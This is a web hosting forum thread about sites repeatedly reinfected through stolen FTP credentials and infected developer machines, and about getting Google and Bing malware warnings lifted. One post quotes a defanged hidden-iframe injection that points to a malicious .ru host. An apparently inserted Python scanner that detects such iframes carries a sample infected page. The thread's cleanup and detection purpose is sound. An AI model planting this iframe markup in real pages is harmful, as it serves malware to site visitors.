#1
Here's a good example...
I have a customer (a developer) with some 25 sites in his account. Since May he has been hacked left and right. His developers swear they were cleaning the sites, their own computers, changed passwords etc. Every three days, they would get hit again. I finally had enough and I told my customer that I would prove to him that his developers are second rate hacks who don't realize that their own local machines are infected. He said, "That's not possible, they cleaned everything." I said, "Trust ME!". I changed his passwords, painfully cleaned his websites by hand (I've mastered this) deleted everything from the servers and uploaded all clean sites. A masterpiece! I kept his credentials from him for 7 days. In that time, everything remained unhacked, pristine! I gave him the password on the eve of the 7th day. Three days later, all hacked again. People are hitting infected websites, their local machines are getting infected, the passwords are being found and it starts all over again. At this stage of the game weak passwords and compromised local computers are to blame. |
|
#2
My clients had also been experiencing the same problems as described above until I convinced them that their local machines were being infected. Now it is the problem with getting Google to remove their warning tags that is causing me a loss in revenue. Clients don't realize, now that the damage is done, that moving to a different host is not going to remove the warnings any faster. I've already cleaned their sites and submitted the sites for independent review. Does anyone have a faster way to get the Google warnings removed?
#3
I've gotten very good with removing malicious code from webpages and submitting the page for review at Google. The warning page is removed a few hours after my submission. If you're submitting it correctly (and quickly) to Google, you can just tell your customer that all will be back to normal after a few hours.
#5
I sure wish there was a way to get Google to move on this issue faster, but in the last 3 months I've been clearing sites - no way that I've found. Some say to email appeals@stopbadware.org who will verify the site and notify Google that it's fixed; takes 10-14 days sometimes. What a PITA!
Mark
#6
The hidden files were key for me. I will suggest using CAPTCHA to protect your forms.
#7
If anyone gets stuck with "hidden" files, or already has a local copy that is known clean they wish to upload, they can delete the entire domain directory using ftp/sftp (unix only)/webshell OR put in a ticket asking us to delete the directory. If you're struggling with one, speak up in a ticket that you need some help and we'll do our best to get you going in the right direction. More than a few times someone has put in a ticket who has complete clean backups and I've been able to wipe it clean in minutes; they refresh all their passwords, upload their clean copy and have been repaired with very little effort.
I do think bad client practices were a key part of why this attack was so successful. Over the last few years virus software / OS updates / browser updates have stayed on the ball and been pretty quick to fix weaknesses for us. People in general got used to not worrying about security and used really easy-to-guess passwords that were never rotated. You would not believe how many passwords, if one were to generate a password list, contain the user name, the word password, the client's name and birthday or age etc. Weak, easy-to-guess passwords allowed hackers to get a foothold. Minor weaknesses in some software allowed them to see other user directories they could attempt other guesses on over time. Get a few sites "peppered" across the web and you're bound to land a few visitors that are the actual web hosts or worse, developers and resellers. Since these trojan-like programs that populated did very little to end users I think they circulated for a long time (possibly years) collecting information from all over without anyone catching even a hint. This allowed someone out there to build rather large lists of saved passwords over time. It was when someone actually USED all of that information in giant waves that it attracted attention and caught everyone off guard! I've seen very few (close to no) cases that are "new" pop up. It's not that they haven't tried. Our new monitoring setup sees attempts and activities, but with our much stricter password policies, ftp policies, firewall, and interaction of all of the above, we see suspicious activity often when it begins and shut the hacker down mid-action. Just a few wrong guesses and the IP can't access the network. There will always be a few people out there with nothing better to do than attempt a hack, but if everyone stays on the ball with the end users I think we can keep the hackers' success rate minimal if not a complete 0.
#8
This is just another problem with the internet: one group of people (Google) gets too much power and makes it 10X harder to do what you need to do. I will say Google has done more good than bad, but after I dealt with Google to have them remove the malware warning from my sites I hope to never deal with them again.
Just my two cents as a web hoster, not a Vortech employee.
#9
It looks like bing.com (formerly live.com aka Microsoft) is mimicking Google with the warnings. They also require you to create an account, verify the site, and wait before removing the warning. One of my sites has had this warning for at least 6 days and it is perfectly clean:
"Careful! The link to this site is disabled because it might download malicious software that can harm your computer. Learn more We suggest you choose another result, but if you want to risk it, visit the website."
#10
What browser are you using nickp?
#11
This happens in all browsers. It's on the search engine results page on bing.com. I will send you a PM with the search term to see it.
#12
Thanks Nick, good to know that Microsoft is attempting to catch up to the other internet police (Google); now if only they could make IE safe...
#13
I'd rather have IE just go away lol
#14
I have one website that keeps getting reinfected. This might be some new method of infection because I've gotten very good at cleaning out infections and know what to look for and what to do.
This particular infection inserts this line under the body tag: (I've added $ in just to break up the code to make sure viewers don't get infected) <div style="display:none"><iframe src="ht$tp://bio$zavr.ru$:8$080/in$dex.php" width=898 height=703 ></iframe></div><div style="display:none"></div> Avast Antivirus catches it every time, so I knew my site kept getting infected. Then I'd do the same thing... find all the files that got infected, remove the code, and change my password. A few hours later, my website would get reinfected! Google's Attack page also kept showing up, and it has killed my business this week. I then decided to totally nuke the website by turning off web services, turning it back on a while later, uploading the entire website, then changing the password again. Before I uploaded the website, I scanned all the files with Avast... and it was clean. Because I nuked the website, I must have nuked the SSL certificate I was using, so the existing SSL certificate was useless. I decided to upload the website to another server just to test it... and I changed the nameservers of the domain name to point to the other server. 24 hours have passed and the files are infected again! Even with the domain name pointing somewhere else, the files in the VT server got reinfected. (The files in the other server are still clean.) Will turning off web service wipe clean a website directory? If this has happened to you, what did you do to clean it? Obviously I missed something, but I know I was very thorough in cleaning an infection.
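The injection pattern in the post above (a display:none div wrapping an off-site iframe, with a second empty hidden div after it) is easy to miss by eye but easy to scan for. The following is an added example, not code from the thread or from the host: a small Python scanner that walks a site directory and reports every file carrying such a hidden iframe pointing away from the site's own host. The sample HTML is constructed inline and uses the placeholder host malicious.invalid rather than the real domain from the post.

```python
import re
import tempfile
from pathlib import Path

# Hidden <div style="display:none"> immediately wrapping an <iframe> whose src
# is an absolute http(s) URL. Attribute order and quoting are kept flexible
# because injected markup varies between waves of the same campaign.
HIDDEN_IFRAME = re.compile(
    r'<div[^>]*style\s*=\s*["\']?[^"\'>]*display\s*:\s*none[^>]*>\s*'
    r'<iframe[^>]*\bsrc\s*=\s*["\']?(?P<src>https?://[^"\'\s>]+)',
    re.IGNORECASE | re.DOTALL,
)

def find_injections(html: str, site_host: str) -> list[str]:
    """Return src URLs of hidden iframes that point somewhere other than site_host."""
    hits = []
    for m in HIDDEN_IFRAME.finditer(html):
        src = m.group("src")
        host = re.sub(r"^https?://", "", src).split("/")[0].split(":")[0]
        if host.lower() != site_host.lower():
            hits.append(src)
    return hits

def scan_tree(root: Path, site_host: str) -> dict[str, list[str]]:
    """Map each infected web file (relative to root) to the off-site iframe srcs found in it."""
    report = {}
    for p in root.rglob("*"):
        if p.is_file() and p.suffix.lower() in {".html", ".htm", ".php", ".js"}:
            hits = find_injections(p.read_text(errors="replace"), site_host)
            if hits:
                report[p.relative_to(root).as_posix()] = hits
    return report

# Constructed sample pages: one clean (its iframe points at the site's own host),
# one carrying the same shape of injection described in the post, placeholder host.
CLEAN = "<html><body><h1>Welcome</h1><iframe src='https://example.com/map'></iframe></body></html>"
INFECTED = ('<html><body>\n<div style="display:none"><iframe src="http://malicious.invalid:8080/index.php" '
            'width=898 height=703 ></iframe></div><div style="display:none"></div>\n<h1>Welcome</h1></body></html>')

def demo() -> dict[str, list[str]]:
    """Build a throwaway site tree with both samples and scan it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        (root / "index.html").write_text(CLEAN)
        (root / "about").mkdir()
        (root / "about" / "index.php").write_text(INFECTED)
        return scan_tree(root, "example.com")

if __name__ == "__main__":
    for path, srcs in demo().items():
        print(f"{path}: {srcs}")
```

Run it against a fresh download of the site after each cleanup; a non-empty report a few hours after uploading clean files is the reinfection signal, and the file list tells you where to look for the write path (which is usually the stolen FTP credentials the thread is discussing, not the web server itself).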
#15
The only thing that comes to mind immediately would be to check above the webroot in the ftproot.
Lead me not into temptation... I know the short cut... follow me.